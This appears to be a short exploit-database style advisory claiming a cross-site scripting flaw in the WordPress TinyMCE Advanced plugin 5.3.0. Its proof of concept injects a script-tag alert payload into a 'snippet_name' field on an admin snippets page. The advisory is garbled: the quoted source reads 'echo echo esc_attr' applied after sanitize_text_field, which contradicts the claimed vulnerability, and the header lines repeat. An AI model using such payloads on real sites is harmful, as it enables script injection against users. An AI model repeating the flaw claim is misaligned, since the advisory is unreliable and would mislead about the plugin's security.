WordPress TinyMCE-Advanced 5.3.0 Cross Site Scripting

[-] Title : word press plugin tinymce-advanced 5.3.0 - Cross Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/tinymce-advanced/
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/tinymce-advanced/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
tinymce-advanced/insert-html-snippet/admin/snippets.php
==============================================================================================
Vulnerable Source:
200: echo echo esc_attr($search_name);
166: $search_name = sanitize_text_field($_POST['snippet_name']); //
if(isset($_POST)),
===============================================================================================
POC :
http://localhost/wp-content/plugins/tinymce-advanced/insert-html-snippet/admin/snippets.php

step 1 = Go To Web Page =
http://localhost/wp-content/plugins/tinymce-advanced/insert-html-snippet/admin/snippets.php

Step 2 = In the box : "snippet_name"
Step 3 = input box , Add JavaScript Code : <script>alert('XSS')</script>
===============================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************